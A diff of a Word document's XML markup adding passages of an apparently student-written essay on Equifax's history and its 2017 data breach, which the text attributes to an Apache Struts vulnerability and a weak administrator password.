+                      <a:ext cx="1412240" cy="1371600"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -135,7 +139,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>88 million businesses worldwide</w:t>
+        <w:t>88 million businesses worldwide. Equifax sells credit monitoring and fraud-prevention services directly to consumers</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -151,7 +155,441 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Equifax sells credit monitoring and fraud-prevention services directly to consumers</w:t>
+        <w:t>The incorporate owns</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> massive amounts of data </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>on consumers and possess the ability to</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> turn over</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the said data</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to anyone who want</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to know credit of certain individuals.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Originally named Retail Credit Company before its last controversy, Equifax changed its name for a better image and expanded its credit report onto companies in the United States after 1975. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41B4A830" wp14:editId="484BE0F0">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>right</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>796290</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="1571625" cy="171450"/>
+                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+                <wp:wrapTight wrapText="bothSides">
+                  <wp:wrapPolygon edited="0">
+                    <wp:start x="0" y="0"/>
+                    <wp:lineTo x="0" y="19200"/>
+                    <wp:lineTo x="21469" y="19200"/>
+                    <wp:lineTo x="21469" y="0"/>
+                    <wp:lineTo x="0" y="0"/>
+                  </wp:wrapPolygon>
+                </wp:wrapTight>
+                <wp:docPr id="4" name="Text Box 4"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="1571625" cy="171450"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:prstClr val="white"/>
+                        </a:solidFill>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:i w:val="0"/>
+                                <w:noProof/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="begin"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="separate"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:noProof/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>1</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="end"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> Retail Credit Company </w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype w14:anchorId="41B4A830" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Text Box 4" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:72.55pt;margin-top:62.7pt;width:123.75pt;height:13.5pt;z-index:-251652096;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:right;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox inset="0,0,0,0">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Caption"/>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:i w:val="0"/>
+                          <w:noProof/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="begin"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="separate"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:noProof/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>1</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="end"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> Retail Credit Company </w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="tight" anchorx="margin"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Forward to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>September 7</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:vertAlign w:val="superscript"/>
+        </w:rPr>
+        <w:t>th</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, 2017, Equifax announced a cybercrime identity theft event. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Equifax breach had a major failure on the internal control of security system. The underlying causes of this breach</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> involved </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">n Apache Struts </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>vulnerability with an</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IT systems administrator using an insecure </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">password. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Apache Struts is an interface for creating web applications written in Java. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Though the attack was stated to have begun in mid-May, the breach was not observed until July 29, according to Equifax CEO Richard F. Smith and a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">following </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>report by Equifax</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -161,13 +599,524 @@
         </w:rPr>
         <w:t xml:space="preserve">. </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>The incorporate owns</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:afterAutospacing="1" w:line="264" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EBE6C02" wp14:editId="55C80CE5">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="margin">
+                  <wp:align>left</wp:align>
+                </wp:positionH>
+                <wp:positionV relativeFrom="page">
+                  <wp:posOffset>6496050</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="2038350" cy="114300"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:wrapTight wrapText="bothSides">
+                  <wp:wrapPolygon edited="0">
+                    <wp:start x="0" y="0"/>
+                    <wp:lineTo x="0" y="18000"/>
+                    <wp:lineTo x="21398" y="18000"/>
+                    <wp:lineTo x="21398" y="0"/>
+                    <wp:lineTo x="0" y="0"/>
+                  </wp:wrapPolygon>
+                </wp:wrapTight>
+                <wp:docPr id="1" name="Text Box 1"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="2038350" cy="114300"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:prstClr val="white"/>
+                        </a:solidFill>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="Caption"/>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve">Figure </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="begin"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="separate"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:noProof/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>2</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:fldChar w:fldCharType="end"/>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:b/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>Former</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> Equifax CEO Richard </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                                <w:i w:val="0"/>
+                                <w:sz w:val="16"/>
+                              </w:rPr>
+                              <w:t>Smith</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="margin">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape w14:anchorId="4EBE6C02" id="Text Box 1" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:511.5pt;width:160.5pt;height:9pt;z-index:-251654144;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:page;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+                <v:textbox inset="0,0,0,0">
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="Caption"/>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve">Figure </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="begin"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="separate"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:noProof/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>2</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:fldChar w:fldCharType="end"/>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:b/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>Former</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> Equifax CEO Richard </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                          <w:i w:val="0"/>
+                          <w:sz w:val="16"/>
+                        </w:rPr>
+                        <w:t>Smith</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+                <w10:wrap type="tight" anchorx="margin" anchory="page"/>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46737949" wp14:editId="1B462248">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:posOffset>0</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="page">
+              <wp:posOffset>4448175</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="2019300" cy="2019300"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapTight wrapText="bothSides">
+              <wp:wrapPolygon edited="0">
+                <wp:start x="0" y="0"/>
+                <wp:lineTo x="0" y="21396"/>
+                <wp:lineTo x="21396" y="21396"/>
+                <wp:lineTo x="21396" y="0"/>
+                <wp:lineTo x="0" y="0"/>
+              </wp:wrapPolygon>
+            </wp:wrapTight>
+            <wp:docPr id="3" name="Picture 3" descr="Image result for Rick Smith, Chairman and CEO of Equifax"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
